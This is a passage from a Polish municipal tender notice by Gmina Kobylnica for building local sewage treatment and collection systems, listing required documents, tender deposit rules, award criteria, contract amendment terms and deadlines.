w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. 
o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716), sporządzone według Załącznika Nr 5 do SIWZ, 3. Od Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów na zasadach określonych w art. 22a PZP, Zamawiający wymaga przedstawienia dokumentów wymienionych w pkt 2 powyżej. 
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3 powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie zalega 
z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 2) nie otwarto jego likwidacji ani nie ogłoszono upadłości wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 5. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 4 powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Wymagania dotyczące okresu ważności tego dokumentu stosuje się odpowiednio. 6. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający zażąda następujących dokumentów: 1) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w celu potwierdzenia, że Wykonawca spełnienia warunek opisany w sekcji III.1.2) pkt 1 - 5, 2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty, potwierdzających spełnienie warunku opisanego w sekcji III.1.3) pkt 1 lit. a-e SIWZ, sporządzony według Załącznika Nr 6 do SIWZ, 3) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, 
w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzających spełnienie warunku opisanego w III.1.3) pkt 2  
lit. a-c SIWZ, sporządzony według Załącznika Nr 7 do SIWZ
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do oferty sporządzonej w oparciu o formularz oferty, stanowiący Załącznik Nr 1 do SIWZ należy dołączyć aktualne na dzień składania ofert: 1) oświadczenie Wykonawcy składane na podstawie art. 25a ust. 1 PZP w związku z art. 22 ust. 1 pkt 2 PZP dotyczące spełniania warunków udziału, stanowiące Załącznik Nr 2 do SIWZ, 2) oświadczenie Wykonawcy składane na podstawie art. 25a ust. 1 PZP w związku z art. 24 ust. 1 pkt 12-23 i ust. 5 pkt 1, 8 PZP dotyczące przesłanek wykluczenia z postępowania, stanowiące Załącznik Nr 3 do SIWZ, które będą stanowiły wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu 3) zobowiązanie do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia sporządzone według Załącznika Nr 8 do SIWZ, 4) pełnomocnictwo, jeżeli ofertę podpisuje ustanowiony pełnomocnik; 5) w przypadku ustanowienia pełnomocnika do pełnomocnictwa należy dołączyć dokument, z którego wynikają zasady reprezentacji obowiązujące u danego wykonawcy; 6) oryginał dokumentu potwierdzającego wniesienie wadium, w przypadku gdy wadium wniesione zostało w formie gwarancji lub poręczenia. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda wadium: 
1)	dla Zadania Nr 1  w wysokości w wysokości 105 000,00 zł (słownie: sto pięć tysięcy zł 00/100),
2)	dla Zadania Nr 3  w wysokości 33 000,00 zł (słownie: trzydzieści trzy tysiące zł 00/100),
3)	dla Zadania Nr 5  w wysokości 26 000,00 zł (słownie: dwadzieścia sześć tysięcy zł 00/100),
4)	dla Zadania Nr 6  w wysokości 16 000,00 zł (słownie: szesnaście tysięcy zł 00/100).
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium musi obejmować cały okres związania ofertą.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)	w pieniądzu, przelewem na rachunek Urzędu Gminy Kobylnica nr 94 9317 0002 0090 0733 2000 0020 w Banku Spółdzielczym w Sławnie;
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	w gwarancjach bankowych;
4)	w gwarancjach ubezpieczeniowych;
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. 2000 r. Nr 109, poz. 1158 z późn. zm.).
5.	Wadium wniesione w formie pieniądza powinno być oznaczone w następujący sposób: 
Wadium - GIF-IZ.271.RB-5.6.2017
Zadanie Nr ..   
Kopię dowodu wniesienia wadium potwierdzoną za zgodność z oryginałem przez Wykonawcę zaleca się dołączyć do oferty.
6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.	Jako termin wniesienia wadium w formie pieniądza, przelewem zostanie przyjęty termin uznania na rachunku Zamawiającego.
8.	Jeżeli Wykonawca wnosi wadium w innej formie niż pieniądz, oryginał dokumentu wadium należy dołączyć do oferty. 
9.	Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i 5 PZP.
10.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a PZP.
11.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
12.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium 
na podstawie pkt 9.10 SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
14.	Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
15.	Zgodnie z art. 46 ust. 4a PZP Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o  którym mowa w art. 26 ust. 3 i 3a PZP, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 PZP, oświadczenia, 
o którym mowa w art. 25 ust. 1 PZP, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, 
o której mowa w art. 87 ust. 2 pkt 3 PZP, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.  
16.	Zgodnie z art. 46 ust. 5 PZP Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących 
po stronie Wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Z zastrzeżeniem wyjątków przewidzianych umową zmiany treści umowy wymagają pod rygorem nieważności zgody obu Stron, z zachowaniem formy pisemnej.
2.	Wniosek z propozycją zmiany treści umowy złożony przez jedną ze Stron winien zawierać określenie zmiany, uzasadnienie zmiany oraz czasu wykonania zmiany.
3.	Zmiana postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa między innymi w przypadkach opisanych poniżej, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie przedmiotu zamówienia określonego w SIWZ oraz Strony umowy wyraziły zgodę na wprowadzenie zmian, tj.:
1)	zmiany dotyczą osób wskazanych w § 4 umowy, pod warunkiem posiadania przez nowe osoby co najmniej takich samych uprawnień budowlanych, przy czym w przypadku określonym w § 4 ust. 1 i 9 Wykonawca ma bezwzględny obowiązek wyrażenia zgody na zmianę zaproponowaną przez Zamawiającego,
2)	zmiany dotyczą terminów określonych w § 3 ust. 2 umowy: 
a)	w okolicznościach wskazanych w § 3 ust. 5 umowy, tj. w przypadku wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych odbiegających od typowych (np. długotrwałe, obfite opady deszczu, śniegu, gradu, niskie temperatury w dzień i w nocy, przymrozki i inne), uniemożliwiające wykonanie przedmiotu zamówienia  termin ulega wydłużeniu maksymalnie 
o liczbę dni wystąpienia niekorzystnych warunków atmosferycznych,
b)	w przypadku zlecenia wykonania robót budowlanych w trybie art. 144 ust. 1 pkt 6 PZP,
c)	w przypadku wystąpienia okoliczności siły wyższej,
d)	w przypadku wystąpienia innych przeszkód uniemożliwiających prowadzenie robót,
e)	w przypadku przedłużających się procesów administracyjnych,
f)	w ramach realizacji Zadania Nr 1 (o którym mowa w pkt 3.3 ppkt 1 SIWZ): w przypadku okoliczności wynikających z przyczyn leżących po stronie Wykonawcy realizującego roboty budowlane w ramach :
	Zadania Nr 2  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Zagórki wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowościach Dobrzęcino i Słonowice 
wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej,
	Zadania Nr 4  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Runowo Sławieńskie 
wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 5  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 6  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków 
w miejscowości Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej,
g)	w ramach realizacji :
	Zadania Nr 2  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Zagórki wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowościach Dobrzęcino i Słonowice 
wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej,
	Zadania Nr 4  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Runowo Sławieńskie 
wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 5  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, 
	Zadania Nr 6  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków 
w miejscowości Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej,
w przypadku okoliczności wynikających z przyczyn leżących po stronie Wykonawcy realizującego roboty budowlane w ramach Zadania Nr 1 (o którym mowa w pkt 3.3 ppkt 1 SIWZ),
3)	zmiany dotyczą harmonogramu rzeczowo  finansowego, w okolicznościach, o których mowa w § 11 
ust. 9,
4)	zmiany dotyczą okoliczności, określonych w art. 142 ust. 5 PZP, tj.:
a)	zmiany stawki podatku od towarów i usług,
b)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie przepisów ustawowych,
c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne i zdrowotne,
5)	zmiany podmiotów trzecich na etapie realizacji zamówienia, na zasobach których Wykonawca opierał się wskazując spełnianie warunków udziału w postępowaniu, z zastrzeżeniem, że spełnione są warunki udziału w postępowaniu określone w SIWZ,
5)	zmiany zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,
6)	zmiany dotyczą wprowadzenia zamiennych materiałów, urządzeń jak również technologii wykonywania robót przedstawionych w dokumentacji projektowej stanowiącej Załącznik Nr 1 do umowy (w tym dla Zadania Nr 1  Załącznik Nr 1a, dla Zadania Nr 3  Załącznik Nr 1b, dla Zadania Nr 5  Załącznik 
Nr 1c, dla Zadania Nr 6  Załącznik Nr 1d)  pod warunkiem, że zmiany te będą korzystne 
dla Zamawiającego np.: przyczynią się do obniżenia kosztów eksploatacji i konserwacji wykonywanego przedmiotu umowy; poprawienia parametrów technicznych z zastrzeżeniem, iż roboty zamienne nie mogą powodować wzrostu ceny ryczałtowej stanowiącej podstawę do rozliczeń,
7)	zmiany są spowodowane występowaniem niezainwentaryzowanych ukrytych obiektów budowlanych, przeszkód geologicznych, odkryciem obiektów archeologicznych i przyrodniczych podlegających obowiązkowi badania i ochrony, niewybuchów i niewypałów oraz innych przeszkód utrudniających lub uniemożliwiających prowadzenie robót w zgodzie z opisem zamówienia, zasadami wiedzy technicznej 
i właściwymi przepisami. W takim przypadku zmieniony może zostać termin wykonania przedmiotu umowy, bądź sposób i zakres wykonania robót na taki, który uwzględnia trudności spowodowane występowaniem obiektów i przeszkód, o których mowa w zdaniu poprzedzającym,
8)	zmiany są konieczne w związku ze zmianami przepisów prawa mających związek z realizacją umowy albo zmianą zasad finansowania i rozliczania umowy przez podmioty trzecie,
9)	zmiany dotyczą terminów płatności.
4.	Strony dopuszczają możliwość rozwiązania umowy za zgodnym porozumieniem Stron.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/04/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Przedmiot zamówienia finansowany jest ze środków własnych Gminy Kobylnica oraz w zakresie Zadania Nr 1 (dot. lokalnych oczyszczalni ścieków) określonego w pkt 3.3 pkt 1 SIWZ, Zadań Nr 3, Nr 5, Nr 6 
w zakresie budowy lokalnych systemów zbierania ścieków określonych odpowiednio pkt 3.3 ppkt 2 lit. a, c, pkt 3 lit. a, pkt 4 SIWZ planowany jest do dofinansowania ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Gdańsku.
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie Nr 1  roboty budowlane dot. budowy lokalnych systemów oczyszczania ścieków oraz budowy infrastruktury towarzyszącej w miejscowościach Ścięgnica, Zagórki, Runowo Sławieńskie, Dobrzęcino, Płaszewo, Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie Nr 1  roboty budowlane dot. budowy lokalnych systemów oczyszczania ścieków oraz budowy infrastruktury towarzyszącej w miejscowościach Ścięgnica, Zagórki, Runowo Sławieńskie, Dobrzęcino, Płaszewo, Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, w tym: a) Etap Nr 1  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości Ścięgnica wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, b) Etap Nr 2  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości Zagórki wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, c) Etap Nr 3  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości Dobrzęcino wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, d) Etap Nr 4  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości Runowo Sławieńskie wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, e) Etap Nr 5  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości 